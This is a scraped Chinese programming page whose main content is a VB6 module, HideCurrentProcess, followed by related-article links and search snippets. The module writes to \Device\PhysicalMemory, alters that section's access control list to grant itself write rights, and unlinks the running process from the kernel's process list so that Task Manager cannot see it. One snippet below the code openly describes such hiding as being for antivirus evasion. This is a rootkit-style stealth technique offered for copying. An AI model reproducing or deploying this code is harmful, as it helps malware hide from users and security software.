    Private Const OBJ_INHERIT = &H2
    Private Const OBJ_PERMANENT = &H10
    Private Const OBJ_EXCLUSIVE = &H20
    Private Const OBJ_CASE_INSENSITIVE = &H40
    Private Const OBJ_OPENIF = &H80
    Private Const OBJ_OPENLINK = &H100
    Private Const OBJ_KERNEL_HANDLE = &H200
    Private Const OBJ_VALID_ATTRIBUTES = &H3F2
    Private Type OBJECT_ATTRIBUTES
    Length As Long
    RootDirectory As Long
    ObjectName As Long
    Attributes As Long
    SecurityDeor As Long
    SecurityQualityOfService As Long
    End Type
    Private Type ACL
    AclRevision As Byte
    Sbz1 As Byte
    AclSize As Integer
    AceCount As Integer
    Sbz2 As Integer
    End Type
    Private Enum ACCESS_MODE
    NOT_USED_ACCESS
    GRANT_ACCESS
    SET_ACCESS
    DENY_ACCESS
    REVOKE_ACCESS
    SET_AUDIT_SUCCESS
    SET_AUDIT_FAILURE
    End Enum
    Private Enum MULTIPLE_TRUSTEE_OPERATION
    NO_MULTIPLE_TRUSTEE
    TRUSTEE_IS_IMPERSONATE
    End Enum
    Private Enum TRUSTEE_FORM
    TRUSTEE_IS_SID
    TRUSTEE_IS_NAME
    End Enum
    Private Enum TRUSTEE_TYPE
    TRUSTEE_IS_UNKNOWN
    TRUSTEE_IS_USER
    TRUSTEE_IS_GROUP
    End Enum
    Private Type TRUSTEE
    pMultipleTrustee As Long
    MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm As TRUSTEE_FORM
    TrusteeType As TRUSTEE_TYPE
    ptstrName As String
    End Type
    Private Type EXPLICIT_ACCESS
    grfAccessPermissions As Long
    grfAccessMode As ACCESS_MODE
    grfInheritance As Long
    TRUSTEE As TRUSTEE
    End Type
    Private Type AceArray
    List() As EXPLICIT_ACCESS
    End Type
    Private Enum SE_OBJECT_TYPE
    SE_UNKNOWN_OBJECT_TYPE = 0
    SE_FILE_OBJECT
    SE_SERVICE
    SE_PRINTER
    SE_REGISTRY_KEY
    SE_LMSHARE
    SE_KERNEL_OBJECT
    SE_WINDOW_OBJECT
    SE_DS_OBJECT
    SE_DS_OBJECT_ALL
    SE_PROVIDER_DEFINED_OBJECT
    SE_WMIGUID_OBJECT
    End Enum
    Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
    Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long

    Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
    Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)

    Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
    Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
    Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
    Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
    Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
    Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
    End Type

    Private verinfo As OSVERSIONINFO

    Private g_hNtDLL As Long
    Private g_pMapPhysicalMemory As Long
    Private g_hMPM As Long
    Private aByte(3) As Byte
    Public Sub HideCurrentProcess()
    '在进程列表中隐藏当前应用程序进程
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
    If verinfo.dwPlatformId = 2 Then
    If verinfo.dwMajorVersion = 5 Then
    Select Case verinfo.dwMinorVersion
    Case 0
    lOffsetFlink = &HA0
    lOffsetBlink = &HA4
    lOffsetPID = &H9C
    Case 1
    lOffsetFlink = &H88
    lOffsetBlink = &H8C
    lOffsetPID = &H84
    End Select
    End If
    End If
    End If
    If OpenPhysicalMemory <> 0 Then
    thread = GetData(&HFFDFF124)
    process = GetData(thread + &H44)
    fw = GetData(process + lOffsetFlink)
    bw = GetData(process + lOffsetBlink)
    SetData fw + 4, bw
    SetData bw, fw
    CloseHandle g_hMPM
    End If
    End Sub
    Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS

    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD

    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
    SetEntriesInAcl 1, ea, pDacl, pNewDacl

    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0

    CleanUp:
    LocalFree pSD
    LocalFree pNewDacl
    End Sub
    Private Function OpenPhysicalMemory() As Long
    Dim Status As Long
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES

    RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
    Attributes.Length = Len(Attributes)
    Attributes.RootDirectory = 0
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = 0
    Attributes.SecurityDeor = 0
    Attributes.SecurityQualityOfService = 0

    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
    Status = ZwOpenSection(g_hMPM, READ_CONTROL or WRITE_DAC, Attributes)
    SetPhyscialMemorySectionCanBeWrited g_hMPM
    CloseHandle g_hMPM
    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, Attributes)
    End If

    Dim lDirectoty As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
    If verinfo.dwPlatformId = 2 Then
    If verinfo.dwMajorVersion = 5 Then
    Select Case verinfo.dwMinorVersion
    Case 0
    lDirectoty = &H30000
    Case 1
    lDirectoty = &H39000
    End Select
    End If
    End If
    End If

    If Status = 0 Then
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
    If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
    End If
    End Function
    Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long

    VAddr = addr
    CopyMemory aByte(0), VAddr, 4
    lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))

    PGDE = BaseAddress + lTemp * 4
    CopyMemory PGDE, ByVal PGDE, 4

    If (PGDE And 1) <> 0 Then
    lTemp = PGDE And &H80
    If lTemp <> 0 Then
    PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
    Else
    PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
    lTemp = (VAddr And &H3FF000) / (2 ^ 12)
    PTE = PGDE + lTemp * 4
    CopyMemory PTE, ByVal PTE, 4

    If (PTE And 1) <> 0 Then
    PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
    UnmapViewOfFile PGDE
    End If
    End If
    End If

    LinearToPhys = PAddr
    End Function
    Private Function GetData(addr As Long) As Long
    Dim phys As Long, tmp As Long, ret As Long

    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
    ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
    CopyMemory ret, ByVal ret, 4

    UnmapViewOfFile tmp
    GetData = ret
    End If
    End Function
    Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
    Dim phys As Long, tmp As Long, x As Long

    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
    x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
    CopyMemory ByVal x, data, 4

    UnmapViewOfFile tmp
    SetData = True
    End If
    End Function
    Private Function ByteArrToLong(inByte() As Byte) As Double
    Dim I As Integer
    For I = 0 To 3
    ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
    Next I
    End Function


    摘自:http://www.mndsoft.com/blog/VB6/0928.html



    VB相关

    vbline的用法[]

    画图工具的VB实现

    VB 一个获得自己外网 IP 地址的程序代码

    VB程序中实现IP地址子网掩码网关DNS的更改  []

    VB 中应用 FSO 对象模型介绍(摘自网络)

    [] VbFSO 对象的介绍

    VB 画坐标轴

    VB 二进制文件的操作

    [VB]BMPJPGVBKeyCode常数用法

    vb实时曲线的绘制和保存

    VB操作EXCEL

    vb初学回顾:最大公约数 最小公倍数 素数求取

    vb 关于窗口样式的API以及处理文本的API参考

    【引用】在VB6.0中实现弹出式菜单的几种方法

    【引用】URLDownloadToFile_VB下载文件!

    利用WinRar压缩和解压缩文件

    VB 剪切板

    VB实现指示窗口中拖动方框的程序

    VB绘制走动的表针

    如何用VB制作DLL文件

    【引用】VB修改IP地址

    VB多窗体退出代码

    []VB:如何检测到U盘的插拔(源代码)

    巧用SendMessage函数扩展Treeview功能

    vb中如何在任务管理器里面隐藏应用程序进程

    如何实现VBEXCEL的无缝连接

    一个API方式存取日志文件的模块[VB]

    VB用记录集填充表格函数

    VB打开文本文件各种方法

    vb ClipBoard 剪切板应用(复制剪切粘贴)

    【引用】窗口处理技巧大全 vb(窗体控件)

    【转】 Md rd命令之VB

    vb:读写文本文件

    vb中实现真正锁定的带自定义菜单的文本控件

    【引用】使用CommonDialogShowSave后如何判断是保存还是取消?

    vb 关于commondialog的多选VB获取Windows操作系统所有版本

    vb UTF文本文件访问

    VB编程中的Unicode vs Ansi

    VBPiView4注册机

    VB获取超过2G文件的大小

    CopyMemory还要快的函数SuperCopyMemory

    VB:编程效率快步提高之:十七种可用一行代码完成的技巧

    VB画出来的五星红旗

    Qt第一印象——QteQt  


    更多精彩>>>
    展开全文
  • 摘要:VC/C++源码,系统相关,任务管理器 R3任务管理器隐藏,Ring3层隐藏进程 稳定可靠的VC++代码。注:本程序需要在命令提示符环境下运行,在开始运行中打开命令提示符,然后拖动本EXE程序到命令提示符窗口中即可,...
  • 隐藏进程(在任务管理器中看不到

    热门讨论 2012-07-22 08:57:10
    隐藏进程(在任务管理器中看不到,免杀处理用,源码可以自己改,很牛逼的东西,自己写的发出来分享一下
  • Option Explicit-----------------------------------------------------模块名称:modHideProcess.bas模块功能:在 XP/2K 任务管理器进程列表中隐藏当前进程使用方法:直接调用 HideCurrentProcess()模块作者:...
  • 新建一个模块,把以下代码复制进去,然后在load中调用即可实现隐藏当前进程的目的。 Option Explicit ...'模块功能:在 XP/2K 任务管理器进程列表中隐藏当前进程 ' '使用方法:直接调用 HideCu...
  • 网上的c#远程进程代码都不能用,c++的也基本上没用。有啥问题还是自己解决好,所以自己写了一份代码。其中用了自己写的FastWin32(用的老版的,新版的移除了Win32控件操作)
  • 任务管理器实际上是用了SysListView32控件,所以发点消息就可以解决(但是发点消息也没那么容易) ListView_GetItemText宏只是对当前进程有效,对远程进程是无效的,但是label之类的控件gettext对远程进程是有效的...
  • 用下面的代码隐藏进程后可以用IceSword来查看和结束被隐藏的进程-------------------------------------------------------------------------------------模块名称:modHideProcess.bas模块功能:在 XP/2K 任务管理...
  • 任务管理器进程详解

    2012-11-11 13:46:45
    病毒都隐藏任务管理器进程中,如果对进程有一定的了解,就能快速的判断病毒

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 783
精华内容 313
关键字:

任务管理器隐藏进程